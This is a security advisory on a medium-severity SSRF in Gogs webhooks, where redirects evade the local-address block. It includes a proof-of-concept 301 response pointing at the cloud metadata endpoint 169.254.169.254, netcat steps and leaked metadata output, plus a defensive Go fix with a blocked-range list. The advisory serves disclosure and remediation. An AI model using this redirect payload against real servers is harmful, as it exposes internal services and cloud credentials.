Security Bulletin

[Medium] Gogs has SSRF in webhook deliveries

Author: system
Published 2026/6/23

Security Bulletin · Severity: Medium · CVE-2026-47267 · GHSA-c4v7-xg93-qf8g

Vulnerability Overview

Summary

The fix for CVE-2022-1285 prevents adding webhooks, or running webhooks, with URLs whose hostname resolves into localCIDRs. However, webhook deliveries still follow HTTP redirects, which allows reaching hostnames inside localCIDRs: only the initial URL is checked, not the URL of each redirect hop.

This was already communicated in the initial report but it looks like there was a bit of a miscommunication.

Details

By creating a webhook pointing to any URL under the attacker's control that returns the following response:

HTTP/1.1 301 Moved Permanently
Location: http://169.254.169.254/metadata/v1.json
Content-Length: 0
Connection: close

it is possible to reach 169.254.169.254 (the cloud metadata endpoint) from the Gogs server.

PoC

  1. Run netcat on any server
  2. Use this server as the webhook URL
  3. Once you get the request from the webhook (for example by testing it), copy the response above

Results from running this on try.gogs:

{"droplet_id":456901166,"hostname":"gogs-do-nyc3-01","vendor_data":"Content-Type: multipart/mixed; boundary=\"===============8645434374073493512==\"\nMIME-Version: 1.0\n\n--===============8645434374073493512==\nMIME-Version: 1.0\nContent-Type: text/cloud-config; charset=\"us-ascii\"\nContent-Transfer-Encoding: 7bit\nContent-Disposition: attachment; filename=\"cloud-config\"\n\n#cloud-config\n\n# Enable root and password auth\ndisable_roo...{"dhcp_enabled":false,"vpc_peering_enabled":false},"dotty_status":"running","ssh_info":{"port":22}}

Impact

Server-Side Request Forgery (SSRF): the blocklist for local CIDRs can be bypassed through a redirect, exposing internal services and cloud metadata endpoints reachable from the Gogs host.

Fix

The simplest fix is most likely to use Client.CheckRedirect (https://pkg.go.dev/net/http#hdr-Clients_and_Transports) to apply the same hostname check to every redirect target, refusing the redirect when it points to a blocked hostname.
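The following is an added example illustrating that approach; it is not Gogs' own code, and the list of blocked ranges, the function names and the redirect limit are assumptions chosen for the illustration. The same check runs both before the first request and, through CheckRedirect, on every redirect hop, so a 301 to 169.254.169.254 is refused instead of followed:

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"net/url"
	"time"
)

// Blocked ranges. This list is an assumption for the example, not Gogs'
// configured localCIDRs; it covers loopback, RFC 1918 and link-local
// (where the cloud metadata endpoint 169.254.169.254 lives).
var localCIDRs = mustParseCIDRs([]string{
	"127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
	"169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
})

func mustParseCIDRs(cidrs []string) []*net.IPNet {
	nets := make([]*net.IPNet, 0, len(cidrs))
	for _, c := range cidrs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			panic(err)
		}
		nets = append(nets, n)
	}
	return nets
}

// isLocalIP reports whether ip falls inside any blocked range.
func isLocalIP(ip net.IP) bool {
	for _, n := range localCIDRs {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// resolvesToLocal is true for an IP literal in a blocked range, or for a
// name that resolves to at least one such address. Any blocked answer in
// the DNS response is enough to refuse the target.
func resolvesToLocal(hostname string) (bool, error) {
	if ip := net.ParseIP(hostname); ip != nil {
		return isLocalIP(ip), nil
	}
	ips, err := net.LookupIP(hostname)
	if err != nil {
		return false, err
	}
	for _, ip := range ips {
		if isLocalIP(ip) {
			return true, nil
		}
	}
	return false, nil
}

var ErrBlockedTarget = errors.New("webhook target is in a blocked address range")

// CheckWebhookURL is the rule applied when a webhook is created and again
// for every redirect hop. Hypothetical name, not a Gogs API.
func CheckWebhookURL(raw string) error {
	u, err := url.Parse(raw)
	if err != nil {
		return err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("unsupported scheme %q", u.Scheme)
	}
	local, err := resolvesToLocal(u.Hostname())
	if err != nil {
		return err
	}
	if local {
		return ErrBlockedTarget
	}
	return nil
}

// checkRedirect re-validates the redirect target; returning an error makes
// http.Client stop following and surface the error to the caller.
func checkRedirect(req *http.Request, via []*http.Request) error {
	if len(via) >= 5 { // redirect limit, an assumed value
		return errors.New("too many redirects")
	}
	return CheckWebhookURL(req.URL.String())
}

// NewWebhookClient builds the client a delivery routine would use.
func NewWebhookClient() *http.Client {
	return &http.Client{Timeout: 10 * time.Second, CheckRedirect: checkRedirect}
}

func main() {
	fmt.Println(CheckWebhookURL("http://169.254.169.254/metadata/v1.json"))
	fmt.Println(CheckWebhookURL("http://8.8.8.8/hook"))
}
```

One caveat for anyone adopting this shape: checking a hostname at validation time and again at redirect time still leaves a window between the lookup and the connect, so a stricter version performs the range check on the address actually dialed (for example in a custom Transport.DialContext) rather than on a separate resolution.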

Affected Components

Ecosystem   Component        Affected versions   Fixed version
go          gogs.io/gogs     <= 0.14.2           0.14.3

Remediation

Upgrade gogs.io/gogs to 0.14.3 or later.


This bulletin is compiled from the GitHub Advisory Database (CC-BY-4.0 licensed); the data source is noted above.
